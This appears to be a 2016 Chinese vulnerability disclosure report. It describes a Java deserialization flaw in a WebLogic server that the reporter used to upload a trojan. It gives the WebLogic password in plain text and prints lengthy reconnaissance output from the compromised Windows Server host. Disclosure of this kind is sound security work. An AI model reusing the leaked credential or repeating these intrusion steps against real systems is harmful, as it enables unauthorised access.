2016-01-09: 细节已通知厂商并且等待厂商处理中 2016-01-13: 厂商已经确认,细节仅向厂商公开 2016-01-23: 细节向核心白帽子及相关领域专家公开 2016-02-02: 细节向普通白帽子公开 2016-02-12: 细节向实习白帽子公开 2016-02-27: 细节向公众公开
RT
地址**.**.**.**:7001/存在“Java 反序列化”漏洞
直接上传木马到服务器中
weblogic帐号密码:weblogic2015clwb
whoamiwin-9e64hh2k47d\administratornet user\\WIN-9E64HH2K47D 的用户帐户-------------------------------------------------------------------------------Administrator Guest 命令成功完成。net share共享名 资源 注解-------------------------------------------------------------------------------C$ C:\ 默认共享 D$ D:\ 默认共享 E$ E:\ 默认共享 F$ F:\ 默认共享 IPC$ 远程 IPC O$ O:\ 默认共享 ADMIN$ C:\Windows 远程管理 命令成功完成。net start已经启动以下 Windows 服务: Application Experience Application Management Base Filtering Engine Certificate Propagation COM+ Event System Cryptographic Services DCOM Server Process Launcher Desktop Window Manager Session Manager DHCP Client Diagnostic Policy Service Distributed Link Tracking Client Distributed Transaction Coordinator DNS Client Group Policy Client Human Interface Device Access IKE and AuthIP IPsec Keying Modules Intel(R) PROSet Monitoring Service IP Helper IPsec Policy Agent Network Connections Network List Service Network Location Awareness Network Store Interface Service Plug and Play Power Print Spooler Remote Desktop Configuration Remote Desktop Services Remote Desktop Services UserMode Port Redirector Remote Procedure Call (RPC) Remote Registry RPC Endpoint Mapper Security Accounts Manager Server Shell Hardware Detection Software Protection SPP Notification Service System Event Notification Service Task Scheduler TCP/IP NetBIOS Helper User Profile Service Windows Event Log Windows Firewall Windows Management Instrumentation Windows Remote Management (WS-Management) Windows Update Workstation 主动防御命令成功完成。netstat -ano活动连接 协议 本地地址 外部地址 状态 PID TCP **.**.**.**:135 **.**.**.**:0 LISTENING 860 TCP **.**.**.**:445 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:3389 **.**.**.**:0 LISTENING 1984 TCP **.**.**.**:47001 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:49152 **.**.**.**:0 LISTENING 576 TCP **.**.**.**:49153 **.**.**.**:0 LISTENING 964 TCP **.**.**.**:49154 **.**.**.**:0 LISTENING 1004 TCP **.**.**.**:49155 **.**.**.**:0 LISTENING 672 TCP **.**.**.**:49156 **.**.**.**:0 LISTENING 1152 TCP **.**.**.**:49157 **.**.**.**:0 LISTENING 680 TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:7001 **.**.**.**:0 LISTENING 12604 TCP **.**.**.**:7001 **.**.**.**:39632 ESTABLISHED 12604 TCP **.**.**.**:7001 **.**.**.**:39639 ESTABLISHED 12604 TCP **.**.**.**:7001 **.**.**.**:40661 ESTABLISHED 12604 TCP **.**.**.**:7001 **.**.**.**:40673 ESTABLISHED 12604 TCP **.**.**.**:56316 **.**.**.**:80 ESTABLISHED 488 TCP **.**.**.**:56321 **.**.**.**:80 ESTABLISHED 1452 TCP **.**.**.**:57814 **.**.**.**:80 ESTABLISHED 488 TCP **.**.**.**:57815 **.**.**.**:80 ESTABLISHED 1452 TCP **.**.**.**:59603 **.**.**.**:4100 ESTABLISHED 12604 TCP **.**.**.**:61028 **.**.**.**:4100 ESTABLISHED 12604 TCP [::]:135 [::]:0 LISTENING 860 TCP [::]:445 [::]:0 LISTENING 4 TCP [::]:3389 [::]:0 LISTENING 1984 TCP [::]:47001 [::]:0 LISTENING 4 TCP [::]:49152 [::]:0 LISTENING 576 TCP [::]:49153 [::]:0 LISTENING 964 TCP [::]:49154 [::]:0 LISTENING 1004 TCP [::]:49155 [::]:0 LISTENING 672 TCP [::]:49156 [::]:0 LISTENING 1152 TCP [::]:49157 [::]:0 LISTENING 680 UDP **.**.**.**:500 *:* 1004 UDP **.**.**.**:3600 *:* 1452 UDP **.**.**.**:4500 *:* 1004 UDP **.**.**.**:5355 *:* 684 UDP **.**.**.**:51093 *:* 488 UDP **.**.**.**:55783 *:* 1452 UDP **.**.**.**:57849 *:* 12604 UDP **.**.**.**:49779 *:* 488 UDP **.**.**.**:64966 *:* 1452 UDP **.**.**.**:137 *:* 4 UDP **.**.**.**:138 *:* 4 UDP [::]:500 *:* 1004 UDP [::]:4500 *:* 1004 UDP [::]:5355 *:* 684 UDP [::]:57849 *:* 12604 UDP [fe80::7555:44f9:c49d:2ccc%11]:546 *:* 964tasklist /svc映像名称 PID 服务 ========================= ======== ============================================System Idle Process 0 暂缺 System 4 暂缺 smss.exe 440 暂缺 csrss.exe 524 暂缺 wininit.exe 576 暂缺 services.exe 672 暂缺 lsass.exe 680 SamSs lsm.exe 688 暂缺 svchost.exe 784 DcomLaunch, PlugPlay, Power svchost.exe 860 RpcEptMapper, RpcSs svchost.exe 964 Dhcp, eventlog, lmhosts svchost.exe 1004 AeLookupSvc, AppMgmt, CertPropSvc, gpsvc, IKEEXT, iphlpsvc, LanmanServer, ProfSvc, Schedule, SENS, SessionEnv, ShellHWDetection, Winmgmt, wuauserv svchost.exe 296 EventSystem, netprofm, nsi, sppuinotify svchost.exe 252 hidserv, Netman, TrkWks, UmRdpService, UxSm ZhuDongFangYu.exe 492 ZhuDongFangYu svchost.exe 684 CryptSvc, Dnscache, LanmanWorkstation, NlaSvc, WinRM svchost.exe 1076 BFE, DPS, MpsSvc spoolsv.exe 1264 Spooler IPROSetMonitor.exe 1324 Intel(R) PROSet Monitoring Service svchost.exe 1400 RemoteRegistry svchost.exe 1984 TermService svchost.exe 1152 PolicyAgent msdtc.exe 2500 MSDTC sppsvc.exe 2572 sppsvc csrss.exe 836 暂缺 winlogon.exe 3552 暂缺 taskhost.exe 2852 暂缺 dwm.exe 1476 暂缺 explorer.exe 2172 暂缺 360tray.exe 488 暂缺 SoftMgrLite.exe 3652 暂缺 csrss.exe 4524 暂缺 winlogon.exe 3864 暂缺 taskhost.exe 3524 暂缺 dwm.exe 812 暂缺 explorer.exe 2640 暂缺 360tray.exe 1452 暂缺 SoftMgrLite.exe 3420 暂缺 taskmgr.exe 12220 暂缺 rdpclip.exe 3140 暂缺 csrss.exe 3508 暂缺 winlogon.exe 12860 暂缺 LogonUI.exe 12708 暂缺 rdpclip.exe 12028 暂缺 cmd.exe 4436 暂缺 conhost.exe 2388 暂缺 java.exe 12604 暂缺 taskmgr.exe 12856 暂缺 WmiPrvSE.exe 11432 暂缺 findstr.exe 13216 暂缺 conhost.exe 11020 暂缺 tasklist.exe 13252 暂缺 conhost.exe 13232 暂缺 WmiPrvSE.exe 12808 暂缺 ipconfig /allWindows IP 配置 主机名 . . . . . . . . . . . . . : WIN-9E64HH2K47D 主 DNS 后缀 . . . . . . . . . . . : 节点类型 . . . . . . . . . . . . : 混合 IP 路由已启用 . . . . . . . . . . : 否 WINS 代理已启用 . . . . . . . . . : 否以太网适配器 本地连接 2: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Intel(R) I350 Gigabit Network Connection #2 物理地址. . . . . . . . . . . . . : 6C-92-BF-10-B0-96 DHCP 已启用 . . . . . . . . . . . : 是 自动配置已启用. . . . . . . . . . : 是以太网适配器 本地连接: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Intel(R) I350 Gigabit Network Connection 物理地址. . . . . . . . . . . . . : 6C-92-BF-10-B0-97 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 本地链接 IPv6 地址. . . . . . . . : fe80::7555:44f9:c49d:2ccc%11(首选) IPv4 地址 . . . . . . . . . . . . : **.**.**.**(首选) 子网掩码 . . . . . . . . . . . . : **.**.**.** 默认网关. . . . . . . . . . . . . : **.**.**.** DHCPv6 IAID . . . . . . . . . . . : 241996479 DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-1C-C9-08-8F-6C-92-BF-10-B0-97 DNS 服务器 . . . . . . . . . . . : **.**.**.** TCPIP 上的 NetBIOS . . . . . . . : 已启用隧道适配器 isatap.{45DEBBC4-8AB2-4122-AAFF-139F92C8DB18}: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是隧道适配器 isatap.{2D8F6097-9C73-43A0-A55B-96F0F4D930BC}: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #2 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是隧道适配器 Teredo Tunneling Pseudo-Interface: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 IPv6 地址 . . . . . . . . . . . . : 2001:0:da1e:40c2:2c56:26c4:3f57:fff3(首选) 本地链接 IPv6 地址. . . . . . . . : fe80::2c56:26c4:3f57:fff3%15(首选) 默认网关. . . . . . . . . . . . . : :: TCPIP 上的 NetBIOS . . . . . . . : 已禁用systeminfo主机名: WIN-9E64HH2K47DOS 名称: Microsoft Windows Server 2008 R2 Enterprise OS 版本: 6.1.7600 暂缺 Build 7600OS 制造商: Microsoft CorporationOS 配置: 独立服务器OS 构件类型: Multiprocessor Free注册的所有人: Windows 用户注册的组织: 产品 ID: 00486-109-0000007-84472初始安装日期: 2015/4/22, 15:26:53系统启动时间: 2015/8/6, 10:42:59系统制造商: Inspur系统型号: NF5270M3系统类型: x64-based PC处理器: 安装了 2 个处理器。 [01]: Intel64 Family 6 Model 62 Stepping 4 GenuineIntel ~1197 Mhz [02]: Intel64 Family 6 Model 62 Stepping 4 GenuineIntel ~1197 MhzBIOS 版本: American Megatrends Inc. 2.1.7, 2015/1/7Windows 目录: C:\Windows系统目录: C:\Windows\system32启动设备: \Device\HarddiskVolume1系统区域设置: zh-cn;中文(中国)输入法区域设置: zh-cn;中文(中国)时区: (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐物理内存总量: 32,707 MB可用的物理内存: 28,645 MB虚拟内存: 最大值: 65,411 MB虚拟内存: 可用: 61,175 MB虚拟内存: 使用中: 4,236 MB页面文件位置: C:\pagefile.sys域: WORKGROUP登录服务器: \\WIN-9E64HH2K47D修补程序: 暂缺网卡: 安装了 2 个 NIC。 [01]: Intel(R) I350 Gigabit Network Connection 连接名: 本地连接 启用 DHCP: 否 IP 地址 [01]: **.**.**.** [02]: fe80::7555:44f9:c49d:2ccc [02]: Intel(R) I350 Gigabit Network Connection 连接名: 本地连接 2 状态: 媒体连接已中断
加强安全意识
危害等级:高
漏洞Rank:10
确认时间:2016-01-13 11:45
CNVD确认并复现所述情况,已经转由CNCERT下发给湖北分中心,由其后续协调网站管理单位处置.
暂无
